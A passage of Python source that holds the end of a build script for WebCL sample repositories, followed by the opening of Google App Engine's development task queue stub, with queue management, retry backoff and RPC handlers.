for repo in list_repositories[0:-2]:
repolist.append(repo)
# 1 Clone and/or update all the sample repositories
if(options.update or options.all):
update(repolist)
os.chdir(root_repositories)
# 2 Clean (or run a clean-only pass)
if(options.clean or options.all):
clean(repolist,param)
os.chdir(root_repositories)
if options.native:
param = " NAT=1 "
build(repolist,param)
os.chdir(root_repositories)
else:
# 3 Build without validator
if(options.without_validator or options.all):
build(repolist,param)
os.chdir(root_repositories)
# 4 Build with validator
if(options.validator or options.all):
build(repolist," VAL=1" + param)
os.chdir(root_repositories)
# 5 Copy
if(options.copy or options.all):
copy(repolist)
os.chdir(root_repositories)
def list_repo_callback(option, opt, value, parser):
setattr(parser.values, option.dest, value.split(','))
def main():
usage = "usage: %prog [opts]"
parser = OptionParser(usage=usage)
parser.add_option("-a", "--all",
action="store_true", dest="all", default=False,
help="complete process -u -e -w -v -c -p", metavar="ALL")
parser.add_option("-u", "--update",
action="store_true", dest="update", default=False,
help="update the sample repositories", metavar="UPDATE")
parser.add_option("-p", "--profile",
action="store_true", dest="profile", default=False,
help="print the profile log", metavar="PROFILE")
parser.add_option("-o", "--original",
action="store_true", dest="original", default=False,
help="Build using emscripten fork not submodule", metavar="ORIGNAL")
parser.add_option("-v", "--validator",
action="store_true", dest="validator", default=False,
help="Build with webcl-validator enabled", metavar="VALIDATOR")
parser.add_option("-w", "--without-validator",
action="store_true", dest="without_validator", default=False,
help="Build without webcl-validator enabled", metavar="WITHOUT_VALIDATOR")
parser.add_option("-d", "--debug",
action="store_true", dest="debug", default=False,
help="enable all debug flag for webcl-translator", metavar="DEBUG")
parser.add_option("-e", "--erase",
action="store_true", dest="clean", default=False,
help="clean all the javascript generated and build", metavar="CLEAN")
parser.add_option("-c", "--copy",
action="store_true", dest="copy", default=False,
help="copy all the javascript generated after build", metavar="COPY")
parser.add_option("-t", "--thread",
action="store_true", dest="thread", default=False,
help="use thread build", metavar="TREAD")
parser.add_option("-f", "--fastcomp",
action="store_true", dest="fastcomp", default=False,
help="use fastcomp build", metavar="FAST")
parser.add_option("-n", "--native",
action="store_true", dest="native", default=False,
help="use c++ / opencl build", metavar="NAT")
parser.add_option('-r', '--repo',
action='callback', dest="repo", type='string', default='',
callback=list_repo_callback,
help="work only on the repository list :\t\t\t\
0 : webcl-translator/webcl\t\t\t\
1 : webcl-cuda-sample\t\t\t\
2 : webcl-nvidia-sample\t\t\t\
3 : webcl-osx-sample\t\t\t\
4 : webcl-ocltoys\t\t\t\
5 : webcl-davibu\t\t\t\
6 : webcl-book-samples\t\t\t\
7 : webcl-box2d", metavar="0,2,...")
(options, args) = parser.parse_args()
# Launch the different step of the process
launch(parser,options)
# If we want profile
if(options.profile or options.all):
print_prof_data()
if __name__ == "__main__":
main()
|
taskqueue_stub.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Stub version of the Task Queue API.
This stub stores tasks and runs them via dev_appserver's AddEvent capability.
It also validates the tasks by checking their queue name against the queue.yaml.
As well as implementing Task Queue API functions, the stub exposes various other
functions that are used by the dev_appserver's admin console to display the
application's queues and tasks.
"""
from __future__ import with_statement
__all__ = []
import base64
import bisect
import calendar
import datetime
import logging
import os
import random
import string
import threading
import time
import taskqueue_service_pb
import taskqueue
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import queueinfo
from google.appengine.api import request_info
from google.appengine.api.taskqueue import taskqueue
from google.appengine.runtime import apiproxy_errors
DEFAULT_RATE = '5.00/s'
DEFAULT_RATE_FLOAT = 5.0
DEFAULT_BUCKET_SIZE = 5
MAX_ETA = datetime.timedelta(days=30)
MAX_PULL_TASK_SIZE_BYTES = 2 ** 20
MAX_PUSH_TASK_SIZE_BYTES = 100 * (2 ** 10)
MAX_TASK_SIZE = MAX_PUSH_TASK_SIZE_BYTES
MAX_REQUEST_SIZE = 32 << 20
BUILT_IN_HEADERS = set(['x-appengine-queuename',
'x-appengine-taskname',
'x-appengine-taskexecutioncount',
'x-appengine-taskpreviousresponse',
'x-appengine-taskretrycount',
'x-appengine-tasketa',
'x-appengine-development-payload',
'content-length'])
DEFAULT_QUEUE_NAME = 'default'
INF = 1e500
QUEUE_MODE = taskqueue_service_pb.TaskQueueMode
AUTOMATIC_QUEUES = {
DEFAULT_QUEUE_NAME: (0.2, DEFAULT_BUCKET_SIZE, DEFAULT_RATE),
'__cron': (1, 1, '1/s')}
def _GetAppId(request):
"""Returns the app id to use for the given request.
Args:
request: A protocol buffer that has an app_id field.
Returns:
A string containing the app id or None if no app id was specified.
"""
if request.has_app_id():
return request.app_id()
else:
return None
def _SecToUsec(t):
"""Converts a time in seconds since the epoch to usec since the epoch.
Args:
t: Time in seconds since the unix epoch
Returns:
An integer containing the number of usec since the unix epoch.
"""
return int(t * 1e6)
def _UsecToSec(t):
"""Converts a time in usec since the epoch to seconds since the epoch.
Args:
t: Time in usec since the unix epoch
Returns:
A float containing the number of seconds since the unix epoch.
"""
return t / 1e6
def _FormatEta(eta_usec):
"""Formats a task ETA as a date string in UTC."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
return eta.strftime('%Y/%m/%d %H:%M:%S')
def _TruncDelta(timedelta):
"""Strips the microseconds field from a timedelta.
Args:
timedelta: a datetime.timedelta.
Returns:
A datetime.timedelta with the microseconds field not filled.
"""
return datetime.timedelta(days=timedelta.days, seconds=timedelta.seconds)
def _EtaDelta(eta_usec, now):
"""Formats a task ETA as a relative time string."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
if eta > now:
return '%s from now' % _TruncDelta(eta - now)
else:
return '%s ago' % _TruncDelta(now - eta)
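# Worked examples for the conversion helpers above (illustrative only):
#   _SecToUsec(1.5)     -> 1500000
#   _UsecToSec(1500000) -> 1.5
#   _FormatEta(0)       -> '1970/01/01 00:00:00'
#   _EtaDelta(0, datetime.datetime(1970, 1, 1, 0, 1)) -> '0:01:00 ago'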
def QueryTasksResponseToDict(queue_name, task_response, now):
"""Converts a TaskQueueQueryTasksResponse_Task protobuf group into a dict.
Args:
queue_name: The name of the queue this task came from.
task_response: An instance of TaskQueueQueryTasksResponse_Task.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A dict containing the fields used by the dev appserver's admin console.
Raises:
ValueError: A task response contains an unknown HTTP method type.
"""
task = {}
task['name'] = task_response.task_name()
task['queue_name'] = queue_name
task['url'] = task_response.url()
method = task_response.method()
if method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET:
task['method'] = 'GET'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST:
task['method'] = 'POST'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.HEAD:
task['method'] = 'HEAD'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.PUT:
task['method'] = 'PUT'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.DELETE:
task['method'] = 'DELETE'
else:
raise ValueError('Unexpected method: %d' % method)
task['eta'] = _FormatEta(task_response.eta_usec())
task['eta_usec'] = task_response.eta_usec()
task['eta_delta'] = _EtaDelta(task_response.eta_usec(), now)
task['body'] = base64.b64encode(task_response.body())
headers = [(header.key(), header.value())
for header in task_response.header_list()
if header.key().lower() not in BUILT_IN_HEADERS]
headers.append(('X-AppEngine-QueueName', queue_name))
headers.append(('X-AppEngine-TaskName', task_response.task_name()))
headers.append(('X-AppEngine-TaskRetryCount',
str(task_response.retry_count())))
headers.append(('X-AppEngine-TaskETA',
str(_UsecToSec(task_response.eta_usec()))))
headers.append(('X-AppEngine-Development-Payload', '1'))
headers.append(('Content-Length', str(len(task['body']))))
if 'content-type' not in frozenset(key.lower() for key, _ in headers):
headers.append(('Content-Type', 'application/octet-stream'))
headers.append(('X-AppEngine-TaskExecutionCount',
str(task_response.execution_count())))
if task_response.has_runlog() and task_response.runlog().has_response_code():
headers.append(('X-AppEngine-TaskPreviousResponse',
str(task_response.runlog().response_code())))
task['headers'] = headers
return task
class _Group(object):
"""A taskqueue group.
This class contains all of the queues for an application.
"""
def __init__(self, queue_yaml_parser=None, app_id=None,
_all_queues_valid=False, _update_newest_eta=None,
_testing_validate_state=False):
"""Constructor.
Args:
queue_yaml_parser: A function that takes no parameters and returns the
parsed results of the queue.yaml file. If this group is not based on a
queue.yaml file, use None.
app_id: The app id this Group is representing or None if it is the
currently running application.
_all_queues_valid: Automatically generate queues on first access.
_update_newest_eta: Callable for automatically executing tasks.
Takes the ETA of the task in seconds since the epoch. May be None if
automatic task running is disabled.
_testing_validate_state: Should this _Group and all of its _Queues
validate their state after each operation? This should only be used
during testing of the taskqueue_stub.
"""
self._queues = {}
self._queue_yaml_parser = queue_yaml_parser
self._all_queues_valid = _all_queues_valid
self._next_task_id = 1
self._app_id = app_id
if _update_newest_eta is None:
self._update_newest_eta = lambda x: None
else:
self._update_newest_eta = _update_newest_eta
self._testing_validate_state = _testing_validate_state
def GetQueuesAsDicts(self):
"""Gets all the applications's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12,
'acl': ['user1@gmail.com']}, ...]
The list of queues always includes the default queue.
"""
self._ReloadQueuesFromYaml()
now = datetime.datetime.utcnow()
queues = []
for queue_name, queue in sorted(self._queues.items()):
queue_dict = {}
queues.append(queue_dict)
queue_dict['name'] = queue_name
queue_dict['bucket_size'] = queue.bucket_capacity
if queue.user_specified_rate is not None:
queue_dict['max_rate'] = queue.user_specified_rate
else:
queue_dict['max_rate'] = ''
if queue.queue_mode == QUEUE_MODE.PULL:
queue_dict['mode'] = 'pull'
else:
queue_dict['mode'] = 'push'
queue_dict['acl'] = queue.acl
if queue.Oldest():
queue_dict['oldest_task'] = _FormatEta(queue.Oldest())
queue_dict['eta_delta'] = _EtaDelta(queue.Oldest(), now)
else:
queue_dict['oldest_task'] = ''
queue_dict['eta_delta'] = ''
queue_dict['tasks_in_queue'] = queue.Count()
if queue.retry_parameters:
retry_proto = queue.retry_parameters
retry_dict = {}
if retry_proto.has_retry_limit():
retry_dict['retry_limit'] = retry_proto.retry_limit()
if retry_proto.has_age_limit_sec():
retry_dict['age_limit_sec'] = retry_proto.age_limit_sec()
if retry_proto.has_min_backoff_sec():
retry_dict['min_backoff_sec'] = retry_proto.min_backoff_sec()
if retry_proto.has_max_backoff_sec():
retry_dict['max_backoff_sec'] = retry_proto.max_backoff_sec()
if retry_proto.has_max_doublings():
retry_dict['max_doublings'] = retry_proto.max_doublings()
queue_dict['retry_parameters'] = retry_dict
return queues
def HasQueue(self, queue_name):
"""Check if the specified queue_name references a valid queue.
Args:
queue_name: The name of the queue to check.
Returns:
True if the queue exists, False otherwise.
"""
self._ReloadQueuesFromYaml()
return queue_name in self._queues and (
self._queues[queue_name] is not None)
def GetQueue(self, queue_name):
"""Gets the _Queue instance for the specified queue.
Args:
queue_name: The name of the queue to fetch.
Returns:
The _Queue instance for the specified queue.
Raises:
KeyError if the queue does not exist.
"""
self._ReloadQueuesFromYaml()
return self._queues[queue_name]
def GetNextPushTask(self):
"""Finds the task with the lowest eta.
Returns:
A tuple containing the queue and task instance for the task with the
lowest eta, or (None, None) if there are no tasks.
"""
min_eta = INF
result = None, None
for queue in self._queues.itervalues():
if queue.queue_mode == QUEUE_MODE.PULL:
continue
task = queue.OldestTask()
if not task:
continue
if task.eta_usec() < min_eta:
result = queue, task
min_eta = task.eta_usec()
return result
def _ConstructQueue(self, queue_name, *args, **kwargs):
if '_testing_validate_state' in kwargs:
raise TypeError(
'_testing_validate_state should not be passed to _ConstructQueue')
kwargs['_testing_validate_state'] = self._testing_validate_state
self._queues[queue_name] = _Queue(queue_name, *args, **kwargs)
def _ConstructAutomaticQueue(self, queue_name):
if queue_name in AUTOMATIC_QUEUES:
self._ConstructQueue(queue_name, *AUTOMATIC_QUEUES[queue_name])
else:
assert self._all_queues_valid
self._ConstructQueue(queue_name)
def _ReloadQueuesFromYaml(self):
"""Update the queue map with the contents of the queue.yaml file.
This function will remove queues that no longer exist in the queue.yaml
file.
If no queue yaml parser has been defined, this function is a no-op.
"""
if not self._queue_yaml_parser:
return
queue_info = self._queue_yaml_parser()
if queue_info and queue_info.queue:
queues = queue_info.queue
else:
queues = []
old_queues = set(self._queues)
new_queues = set()
for entry in queues:
queue_name = entry.name
new_queues.add(queue_name)
retry_parameters = None
if entry.bucket_size:
bucket_size = entry.bucket_size
else:
bucket_size = DEFAULT_BUCKET_SIZE
if entry.retry_parameters:
retry_parameters = queueinfo.TranslateRetryParameters(
entry.retry_parameters)
if entry.mode == 'pull':
mode = QUEUE_MODE.PULL
if entry.rate is not None:
logging.warning(
'Refill rate must not be specified for pull-based queue. '
'Please check queue.yaml file.')
else:
mode = QUEUE_MODE.PUSH
if entry.rate is None:
logging.warning(
'Refill rate must be specified for push-based queue. '
'Please check queue.yaml file.')
max_rate = entry.rate
if entry.acl is not None:
acl = taskqueue_service_pb.TaskQueueAcl()
for acl_entry in entry.acl:
acl.add_user_email(acl_entry.user_email)
else:
acl = None
if self._queues.get(queue_name) is None:
self._ConstructQueue(queue_name, bucket_capacity=bucket_size,
user_specified_rate=max_rate, queue_mode=mode,
acl=acl, retry_parameters=retry_parameters,
target=entry.target)
else:
queue = self._queues[queue_name]
queue.bucket_capacity = bucket_size
queue.user_specified_rate = max_rate
queue.acl = acl
queue.queue_mode = mode
queue.retry_parameters = retry_parameters
if mode == QUEUE_MODE.PUSH:
eta = queue.Oldest()
if eta:
self._update_newest_eta(_UsecToSec(eta))
if DEFAULT_QUEUE_NAME not in self._queues:
self._ConstructAutomaticQueue(DEFAULT_QUEUE_NAME)
new_queues.add(DEFAULT_QUEUE_NAME)
if not self._all_queues_valid:
for queue_name in old_queues - new_queues:
del self._queues[queue_name]
def _ValidateQueueName(self, queue_name):
"""Tests if the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
queue_name: The name of the queue to check.
Returns:
If there are no problems, returns TaskQueueServiceError.OK. Otherwise
returns the correct constant from TaskQueueServiceError.
"""
if not queue_name:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_NAME
elif queue_name not in self._queues:
if queue_name in AUTOMATIC_QUEUES or self._all_queues_valid:
self._ConstructAutomaticQueue(queue_name)
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE
elif self._queues[queue_name] is None:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE
return taskqueue_service_pb.TaskQueueServiceError.OK
def _CheckQueueForRpc(self, queue_name):
"""Ensures the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
queue_name: The name of the queue to check.
Raises:
ApplicationError: If the queue name is invalid, tombstoned or does not
exist.
"""
self._ReloadQueuesFromYaml()
response = self._ValidateQueueName(queue_name)
if response != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(response)
def _ChooseTaskName(self):
"""Returns a string containing a unique task name."""
self._next_task_id += 1
return 'task%d' % (self._next_task_id - 1)
def _VerifyTaskQueueAddRequest(self, request, now):
"""Checks that a TaskQueueAddRequest is valid.
Checks that a TaskQueueAddRequest specifies a valid eta and a valid queue.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest to validate.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A taskqueue_service_pb.TaskQueueServiceError indicating any problems with
the request or taskqueue_service_pb.TaskQueueServiceError.OK if it is
valid.
"""
if request.eta_usec() < 0:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(request.eta_usec()))
max_eta = now + MAX_ETA
if eta > max_eta:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
queue_name_response = self._ValidateQueueName(request.queue_name())
if queue_name_response != taskqueue_service_pb.TaskQueueServiceError.OK:
return queue_name_response
if request.has_crontimetable() and self._app_id is None:
return taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED
if request.mode() == QUEUE_MODE.PULL:
max_task_size_bytes = MAX_PULL_TASK_SIZE_BYTES
else:
max_task_size_bytes = MAX_PUSH_TASK_SIZE_BYTES
if request.ByteSize() > max_task_size_bytes:
return taskqueue_service_pb.TaskQueueServiceError.TASK_TOO_LARGE
return taskqueue_service_pb.TaskQueueServiceError.OK
def BulkAdd_Rpc(self, request, response):
"""Add many tasks to a queue using a single request.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
self._ReloadQueuesFromYaml()
if not request.add_request(0).queue_name():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
error_found = False
task_results_with_chosen_names = set()
now = datetime.datetime.utcfromtimestamp(time.time())
for add_request in request.add_request_list():
task_result = response.add_taskresult()
result = self._VerifyTaskQueueAddRequest(add_request, now)
if result == taskqueue_service_pb.TaskQueueServiceError.OK:
if not add_request.task_name():
chosen_name = self._ChooseTaskName()
add_request.set_task_name(chosen_name)
task_results_with_chosen_names.add(id(task_result))
task_result.set_result(
taskqueue_service_pb.TaskQueueServiceError.SKIPPED)
else:
error_found = True
task_result.set_result(result)
if error_found:
return
if request.add_request(0).has_transaction():
self._TransactionalBulkAdd(request)
else:
self._NonTransactionalBulkAdd(request, response, now)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
if (task_result.result() ==
taskqueue_service_pb.TaskQueueServiceError.SKIPPED):
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if id(task_result) in task_results_with_chosen_names:
task_result.set_chosen_task_name(add_request.task_name())
def _TransactionalBulkAdd(self, request):
"""Uses datastore.AddActions to associate tasks with a transaction.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
assigned unique names.
"""
try:
apiproxy_stub_map.MakeSyncCall(
'datastore_v3', 'AddActions', request, api_base_pb.VoidProto())
except apiproxy_errors.ApplicationError, e:
raise apiproxy_errors.ApplicationError(
e.application_error +
taskqueue_service_pb.TaskQueueServiceError.DATASTORE_ERROR,
e.error_detail)
def _NonTransactionalBulkAdd(self, request, response, now):
"""Adds tasks to the appropriate _Queue instance.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
those with empty names have been assigned unique names.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse to populate
with the results. N.B. the chosen_task_name field in the response will
not be filled-in.
now: A datetime.datetime object containing the current time in UTC.
"""
queue_mode = request.add_request(0).mode()
queue_name = request.add_request(0).queue_name()
store = self._queues[queue_name]
if store.queue_mode != queue_mode:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
try:
store.Add(add_request, now)
except apiproxy_errors.ApplicationError, e:
task_result.set_result(e.application_error)
else:
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if (store.queue_mode == QUEUE_MODE.PUSH and
store.Oldest() == add_request.eta_usec()):
self._update_newest_eta(_UsecToSec(add_request.eta_usec()))
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
queue_name = request.queue_name()
error = self._ValidateQueueName(queue_name)
is_unknown_queue = (
error == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
if error != taskqueue_service_pb.TaskQueueServiceError.OK and (
not is_unknown_queue):
raise apiproxy_errors.ApplicationError(error)
if is_unknown_queue:
self._queues[queue_name] = _Queue(request.queue_name())
if self._app_id is not None:
self._queues[queue_name].Populate(random.randint(10, 100))
self._queues[queue_name].UpdateQueue_Rpc(request, response)
def FetchQueues_Rpc(self, request, response):
"""Implementation of the FetchQueues RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._ReloadQueuesFromYaml()
for queue_name in sorted(self._queues):
if response.queue_size() > request.max_rows():
break
if self._queues[queue_name] is None:
continue
self._queues[queue_name].FetchQueues_Rpc(request, response)
def FetchQueueStats_Rpc(self, request, response):
"""Implementation of the FetchQueueStats rpc which returns 'random' data.
This implementation loads some stats from the task store, the rest are
random numbers.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
for queue_name in request.queue_name_list():
stats = response.add_queuestats()
if queue_name not in self._queues:
stats.set_num_tasks(0)
stats.set_oldest_eta_usec(-1)
continue
store = self._queues[queue_name]
stats.set_num_tasks(store.Count())
if stats.num_tasks() == 0:
stats.set_oldest_eta_usec(-1)
else:
stats.set_oldest_eta_usec(store.Oldest())
if random.randint(0, 9) > 0:
scanner_info = stats.mutable_scanner_info()
scanner_info.set_executed_last_minute(random.randint(0, 10))
scanner_info.set_executed_last_hour(scanner_info.executed_last_minute()
+ random.randint(0, 100))
scanner_info.set_sampling_duration_seconds(random.random() * 10000.0)
scanner_info.set_requests_in_flight(random.randint(0, 10))
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryTasks_Rpc(request, response)
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._ReloadQueuesFromYaml()
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].FetchTask_Rpc(request, response)
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._ReloadQueuesFromYaml()
def _AddResultForAll(result):
for _ in request.task_name_list():
response.add_result(result)
if request.queue_name() not in self._queues:
_AddResultForAll(taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
elif self._queues[request.queue_name()] is None:
_AddResultForAll(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE)
else:
self._queues[request.queue_name()].Delete_Rpc(request, response)
def DeleteQueue_Rpc(self, request, response):
"""Implementation of the DeleteQueue RPC.
Tombstones the queue.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()] = None
def PauseQueue_Rpc(self, request, response):
"""Implementation of the PauseQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].paused = request.pause()
def PurgeQueue_Rpc(self, request, response):
"""Implementation of the PurgeQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].PurgeQueue()
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryAndOwnTasks_Rpc(request, response)
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].ModifyTaskLease_Rpc(request, response)
class Retry(object):
"""Task retry caclulator class.
Determines if and when a task should next be run
"""
_default_params = taskqueue_service_pb.TaskQueueRetryParameters()
def __init__(self, task, queue):
"""Constructor.
Args:
task: A taskqueue_service_pb.TaskQueueQueryTasksResponse_Task instance.
May be None.
queue: A _Queue instance. May be None.
"""
if task is not None and task.has_retry_parameters():
self._params = task.retry_parameters()
elif queue is not None and queue.retry_parameters is not None:
self._params = queue.retry_parameters
else:
self._params = self._default_params
def CanRetry(self, retry_count, age_usec):
"""Computes whether a task can be retried.
Args:
retry_count: An integer specifying which retry this is.
age_usec: An integer specifying the microseconds since the first try.
Returns:
True if a task is eligible for retrying.
"""
if self._params.has_retry_limit() and self._params.has_age_limit_sec():
return (self._params.retry_limit() >= retry_count or
self._params.age_limit_sec() >= _UsecToSec(age_usec))
if self._params.has_retry_limit():
return self._params.retry_limit() >= retry_count
if self._params.has_age_limit_sec():
return self._params.age_limit_sec() >= _UsecToSec(age_usec)
return True
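# Note: when both retry_limit and age_limit_sec are set, the checks above are
# OR-ed, so a task stays retryable while EITHER limit is still unexhausted,
# not only while both are.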
def CalculateBackoffUsec(self, retry_count):
"""Calculates time before the specified retry.
Args:
retry_count: An integer specifying which retry this is.
Returns:
The number of microseconds before a task should be retried.
"""
exponent = min(retry_count - 1, self._params.max_doublings())
linear_steps = retry_count - exponent
min_backoff_usec = _SecToUsec(self._params.min_backoff_sec())
max_backoff_usec = _SecToUsec(self._params.max_backoff_sec())
backoff_usec = min_backoff_usec
if exponent > 0:
backoff_usec *= (2 ** (min(1023, exponent)))
if linear_steps > 1:
backoff_usec *= linear_steps
return int(min(max_backoff_usec, backoff_usec))
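# Worked example (hypothetical retry parameters, purely illustrative): with
# min_backoff_sec=1, max_backoff_sec=3600 and max_doublings=3, successive
# retries back off 1s, 2s, 4s, 8s (doubling), then 16s, 24s, 32s, ...
# (growing linearly once max_doublings is exhausted), always capped at
# max_backoff_sec.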
class _Queue(object):
"""A Taskqueue Queue.
This class contains all of the properties of a queue and a sorted list of
tasks.
"""
def __init__(self, queue_name, bucket_refill_per_second=DEFAULT_RATE_FLOAT,
bucket_capacity=DEFAULT_BUCKET_SIZE,
user_specified_rate=DEFAULT_RATE, retry_parameters=None,
max_concurrent_requests=None, paused=False,
queue_mode=QUEUE_MODE.PUSH, acl=None,
_testing_validate_state=None, target=None):
self.queue_name = queue_name
self.bucket_refill_per_second = bucket_refill_per_second
self.bucket_capacity = bucket_capacity
self.user_specified_rate = user_specified_rate
self.retry_parameters = retry_parameters
self.max_concurrent_requests = max_concurrent_requests
self.paused = paused
self.queue_mode = queue_mode
self.acl = acl
self.target = target
self._testing_validate_state = _testing_validate_state
self.task_name_archive = set()
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
self._lock = threading.Lock()
def VerifyIndexes(self):
"""Ensures that all three indexes are in a valid state.
This method is used by internal tests and should not need to be called in
any other circumstances.
Raises:
AssertionError: if the indexes are not in a valid state.
"""
assert self._IsInOrder(self._sorted_by_name)
assert self._IsInOrder(self._sorted_by_eta)
assert self._IsInOrder(self._sorted_by_tag)
tasks_by_name = set()
tasks_with_tags = set()
for name, task in self._sorted_by_name:
assert name == task.task_name()
assert name not in tasks_by_name
tasks_by_name.add(name)
if task.has_tag():
tasks_with_tags.add(name)
tasks_by_eta = set()
for eta, name, task in self._sorted_by_eta:
assert name == task.task_name()
assert eta == task.eta_usec()
assert name not in tasks_by_eta
tasks_by_eta.add(name)
assert tasks_by_eta == tasks_by_name
tasks_by_tag = set()
for tag, eta, name, task in self._sorted_by_tag:
assert name == task.task_name()
assert eta == task.eta_usec()
assert task.has_tag() and task.tag()
assert tag == task.tag()
assert name not in tasks_by_tag
tasks_by_tag.add(name)
assert tasks_by_tag == tasks_with_tags
@staticmethod
def _IsInOrder(l):
"""Determine if the specified list is in ascending order.
Args:
l: The list to check
Returns:
True if the list is in order, False otherwise
"""
sorted_list = sorted(l)
return l == sorted_list
def _WithLock(f):
"""Runs the decorated function within self._lock.
Args:
f: The function to be delegated to. Must be a member function (take self
as the first parameter).
Returns:
The result of f.
"""
def _Inner(self, *args, **kwargs):
with self._lock:
ret = f(self, *args, **kwargs)
if self._testing_validate_state:
self.VerifyIndexes()
return ret
_Inner.__doc__ = f.__doc__
return _Inner
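# Note: self._lock is a plain, non-reentrant threading.Lock, so a method
# decorated with _WithLock must not call another decorated method; internal
# callers use undecorated helpers (e.g. the *NoAcquireLock methods), which
# assert that the lock is already held.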
@_WithLock
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
assert request.queue_name() == self.queue_name
self.bucket_refill_per_second = request.bucket_refill_per_second()
